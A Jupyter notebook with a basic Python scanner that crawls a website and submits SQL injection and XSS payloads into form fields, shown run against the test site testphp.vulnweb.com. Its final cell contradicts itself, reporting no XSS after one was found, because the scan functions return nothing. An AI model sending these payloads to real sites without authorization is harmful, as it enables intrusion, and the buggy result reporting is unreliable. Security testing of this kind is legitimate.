In [1]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse
from colorama import Fore, Style


In [2]:
def get_all_forms(url):
    """Extracts all forms from the given URL."""
    soup = BeautifulSoup(requests.get(url).content, "html.parser")
    return soup.find_all("form")


In [3]:
def get_form_details(form):
    """Extracts details from a form tag."""
    details = {}
    action = form.attrs.get("action")
    method = form.attrs.get("method", "get").lower()
    inputs = []
    for input_tag in form.find_all(["input", "textarea"]):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details


In [4]:
def is_vulnerable_sqli(response):
    """Checks if the response contains common SQL error messages."""
    errors = [
        "you have an error in your sql syntax",
        "warning: mysql",
        "unclosed quotation mark after the character string",
        "quoted string not properly terminated",
    ]
    for error in errors:
        if error in response.content.decode().lower():
            return True
    return False


In [5]:
def scan_sql_injection(url):
    payloads = ["' OR 1=1 --", "' OR 'a'='a"]
    forms = get_all_forms(url)
    for form in forms:
        form_details = get_form_details(form)
        for payload in payloads:
            data = {}
            for input_tag in form_details["inputs"]:
                if input_tag["type"] == "text" or input_tag["type"] == "search":
                    data[input_tag["name"]] = payload
                else:
                    data[input_tag["name"]] = "test"
            target_url = urljoin(url, form_details["action"])
            if form_details["method"] == "post":
                res = requests.post(target_url, data=data)
            else:
                res = requests.get(target_url, params=data)
            if is_vulnerable_sqli(res):
                print(Fore.RED + f"[!] SQL Injection vulnerability found in {target_url}" + Style.RESET_ALL)
                break


In [6]:
def scan_xss(url):
    xss_payload = "<script>alert('XSS')</script>"
    forms = get_all_forms(url)
    for form in forms:
        form_details = get_form_details(form)
        data = {}
        for input_tag in form_details["inputs"]:
            if input_tag["type"] == "text" or input_tag["type"] == "search":
                data[input_tag["name"]] = xss_payload
            else:
                data[input_tag["name"]] = "test"
        target_url = urljoin(url, form_details["action"])
        if form_details["method"] == "post":
            res = requests.post(target_url, data=data)
        else:
            res = requests.get(target_url, params=data)
        if xss_payload in res.text:
            print(Fore.RED + f"[!] XSS vulnerability found in {target_url}" + Style.RESET_ALL)


In [7]:
def crawl_website(start_url, max_pages=20):
    visited = set()
    to_visit = [start_url]
    
    while to_visit and len(visited) < max_pages:
        url = to_visit.pop(0)
        if url in visited:
            continue
        visited.add(url)
        
        print(Fore.YELLOW + f"\n[+] Scanning {url}" + Style.RESET_ALL)
        try:
            run_single_scan(url)
        except Exception as e:
            print(Fore.RED + f"Error scanning {url}: {e}" + Style.RESET_ALL)
        
        try:
            soup = BeautifulSoup(requests.get(url).content, "html.parser")
            for link in soup.find_all("a", href=True):
                full_url = urljoin(url, link["href"])
                if urlparse(full_url).netloc == urlparse(start_url).netloc:
                    if full_url not in visited:
                        to_visit.append(full_url)
        except:
            pass


In [8]:
def run_single_scan(url):
    print(Fore.CYAN + "[*] Scanning for SQL Injection..." + Style.RESET_ALL)
    scan_sql_injection(url)
    print(Fore.CYAN + "[*] Scanning for XSS..." + Style.RESET_ALL)
    scan_xss(url)


In [12]:
start_url = input("Enter the website URL to scan: ")
crawl_website(start_url, max_pages=2)

# After crawling
print("\nScanning for vulnerabilities...\n")

# Scan for XSS
xss_vulnerabilities = scan_xss(start_url)
if xss_vulnerabilities:
    print("[+] XSS Vulnerabilities Found:")
    for vuln in xss_vulnerabilities:
        print("   -", vuln)
else:
    print("[-] No XSS vulnerabilities found.")

# Scan for SQL Injection
sql_vulnerabilities = scan_sql_injection(start_url)
if sql_vulnerabilities:
    print("[+] SQL Injection Vulnerabilities Found:")
    for vuln in sql_vulnerabilities:
        print("   -", vuln)
else:
    print("[-] No SQL injection vulnerabilities found.")


Enter the website URL to scan:  http://testphp.vulnweb.com


[33m
[+] Scanning http://testphp.vulnweb.com[0m
[36m[*] Scanning for SQL Injection...[0m
[36m[*] Scanning for XSS...[0m
[31m[!] XSS vulnerability found in http://testphp.vulnweb.com/search.php?test=query[0m
[33m
[+] Scanning http://testphp.vulnweb.com/index.php[0m
[36m[*] Scanning for SQL Injection...[0m
[36m[*] Scanning for XSS...[0m
[31m[!] XSS vulnerability found in http://testphp.vulnweb.com/search.php?test=query[0m

Scanning for vulnerabilities...

[31m[!] XSS vulnerability found in http://testphp.vulnweb.com/search.php?test=query[0m
[-] No XSS vulnerabilities found.
[-] No SQL injection vulnerabilities found.


In [None]:
http://testphp.vulnweb.com
